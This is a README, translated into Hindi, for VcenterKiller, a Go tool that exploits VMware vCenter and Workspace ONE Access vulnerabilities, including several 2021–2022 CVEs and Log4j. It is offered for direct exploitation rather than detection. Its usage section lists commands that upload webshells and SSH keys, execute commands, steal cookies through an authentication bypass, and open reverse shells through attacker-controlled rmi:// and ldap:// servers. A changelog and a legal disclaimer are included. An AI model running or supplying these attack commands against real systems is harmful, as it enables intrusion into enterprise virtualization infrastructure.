
Vcenter के लिए एक व्यापक उपयोग उपकरण, जिसमें वर्तमान में सबसे लोकप्रिय CVE-2021-21972, CVE-2021-21985 और CVE-2021-22005, One Access के CVE-2022-22954, CVE-2022-22972/31656 और log4j शामिल हैं, वेबशेल अपलोड करने, कमांड निष्पादित करने या SSH पासवर्ड रहित कनेक्शन के लिए सार्वजनिक कुंजी अपलोड करने की एक-क्लिक सुविधा प्रदान करता है।
यदि आप स्थानीय वातावरण में भेद्यता वातावरण स्थापित कर रहे हैं, तो vckiller के साथ log4j को सत्यापित करना मूल रूप से विफल हो जाएगा, क्योंकि Vmware वर्चुअल मशीन वातावरण में NAT मोड का उपयोग करने पर, सत्यापन मॉड्यूल में आउटगोइंग नेटवर्क कार्ड को 127.0.0.1 के रूप में निर्धारित किया जाएगा, इसलिए लक्ष्य द्वारा एक्सेस किया गया LDAP सर्वर पता 127.0.0.1 बन जाता है, और सत्यापन विफल हो जाता है 😏
यदि आपको कोई बग मिलता है, तो कृपया एक issue बनाएं। यह टूल केवल सुविधा के लिए लिखा गया है; इसमें कुछ भी बहुत उन्नत नहीं है।
Vcenter के लिए एक व्यापक सत्यापन उपकरण, जिसमें सबसे लोकप्रिय CVE-2021-21972, CVE-2021-21985 और CVE-2021-22005 शामिल हैं। यह एक-क्लिक वेबशेल अपलोड, कमांड निष्पादन या सार्वजनिक कुंजी अपलोड और SSH कनेक्शन की सुविधा प्रदान करता है, साथ ही Vcenter पर Apache Log4j CVE-2021-44228 भेद्यता का पता लगाने और शोषण भी करता है, जैसे कमांड निष्पादन और आउटपुट प्राप्त करना (एक ldap दुर्भावनापूर्ण सर्वर की आवश्यकता है)। अब अलग से ldap सर्वर शुरू करने की आवश्यकता नहीं है; मैंने jndi-injection टूल पर आधारित एक शोषण विधि तैयार की है। Vcenter द्वारा उपयोग किया जाने वाला मिडलवेयर Tomcat है, बस TomcatBypass शोषण श्रृंखला का उपयोग करें।
आमतौर पर Vcenter को आंतरिक नेटवर्क में रखा जाता है, और भेद्यता की विशेषताएं भी बहुत सामान्य हैं, जैसे fscan एक स्कैन में सामने आ जाता है। इसलिए VcenterKiller का उपयोग लक्ष्य में भेद्यता की उपस्थिति का पता लगाने के लिए नहीं किया जाता है, बल्कि सीधे शोषण करने का प्रयास किया जाता है। आमतौर पर इसे CS/MSF के माध्यम से जंपबॉक्स पर निष्पादित किया जाता है, इसलिए अन्य फालतू आउटपुट को हटा दिया गया है।
GO का उपयोग क्यों? क्योंकि Python लिखना आसान है लेकिन उपयोग करना परेशानी भरा है, इसमें विभिन्न निर्भरता लाइब्रेरीज़ हैं, और संकलित होने पर आकार बहुत बड़ा होता है। C# क्रॉस-प्लेटफ़ॉर्म नहीं है, इसलिए इसे आधा लिखकर छोड़ दिया गया।
go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh // सार्वजनिक कुंजी अपलोड करें
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // log4j स्कैन करें
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami // ldap सेवा निर्दिष्ट किए बिना भी कर सकते हैं
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 // कुकी प्राप्त करें
./main.exe -u https://xx.xx.com -m 31656 // यदि CVE-2022-22972 काम नहीं करता है, तो CVE-2022-31656 का उपयोग करें
यह उपकरण केवल कानूनी रूप से अधिकृत उद्यम सुरक्षा निर्माण गतिविधियों, जैसे आंतरिक हमले और बचाव अभ्यास, भेद्यता सत्यापन और पुनः परीक्षण के लिए है। यदि आपको इस उपकरण की कार्यक्षमता का परीक्षण करने की आवश्यकता है, तो कृपया स्वयं एक लक्ष्य वातावरण स्थापित करें।
इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना चाहिए कि कार्रवाई स्थानीय कानूनों और विनियमों का अनुपालन करती है, और आपने पर्याप्त प्राधिकरण प्राप्त कर लिया है। अनधिकृत लक्ष्यों पर उपयोग न करें।
यदि आप इस उपकरण का उपयोग करते समय कोई अवैध गतिविधि करते हैं, तो आपको स्वयं परिणाम भुगतने होंगे, और हम कोई कानूनी या संबद्ध देयता नहीं लेंगे।
V1.0 लॉन्च
V1.1 CVE-2021-21985 के लिए rmi के माध्यम से रिवर्स शेल फ़ंक्शन जोड़ा गया, लेकिन आपको एक rmi सर्वर शुरू करना होगा, उदाहरण के लिए jndi-injection-exploit
V1.2 Vcenter के लिए log4j का पता लगाने और सत्यापन क्षमता जोड़ी गई
V1.3 Vmware WorkSpace One Access के लिए भेद्यता सत्यापन फ़ंक्शन जोड़ा गया, जिसमें CVE-2022-22954 दूरस्थ कमांड निष्पादन; CVE-2022-22972, CVE-2022-31656 पहचान बाईपास शामिल हैं
V1.3.1 log4j का पता लगाते समय पोर्ट को अनदेखा करने की समस्या ठीक की गई; कुछ सेवाएं डिफ़ॉल्ट 443 पोर्ट बदल देती हैं
V1.3.2 log4j के शोषण के तरीके को संशोधित किया गया, अब tomcatbypassEcho के माध्यम से कमांड निष्पादित करता है और आउटपुट वापस प्राप्त करता है। vcenter 7.0 linux पर परीक्षण पास
V1.3.3 6.7 और 7.0 संस्करणों के बीच अंतर शोषण जोड़ा गया; 7.0 को tomcatbypass का उपयोग करना होगा, जबकि 6.7 सामान्य basic का उपयोग कर सकता है
V1.3.4 log4j के सत्यापन तर्क को संशोधित किया गया; वर्तमान तर्क यह है कि 5 बार विभिन्न पेलोड को बिना भेदभाव के भेजा जाता है; यदि आउटपुट है तो है, नहीं तो नहीं
V1.3.5 log4j की Jndi-Injection-Exploit पर निर्भरता समाप्त की गई; सीधे कमांड निष्पादित कर सकता है और आउटपुट प्राप्त कर सकता है
V1.3.6 21972 के ssh फ़ंक्शन को संशोधित किया गया और अन्य विवरणों को अनुकूलित किया गया
V1.3.7 प्रॉक्सी फ़ंक्शन जोड़ा गया, http और socks का समर्थन करता है
V1.3.8 अभी शुरू नहीं हुआ है, फ़ंक्शन जोड़ने पर विचार कर रहा हूं...
...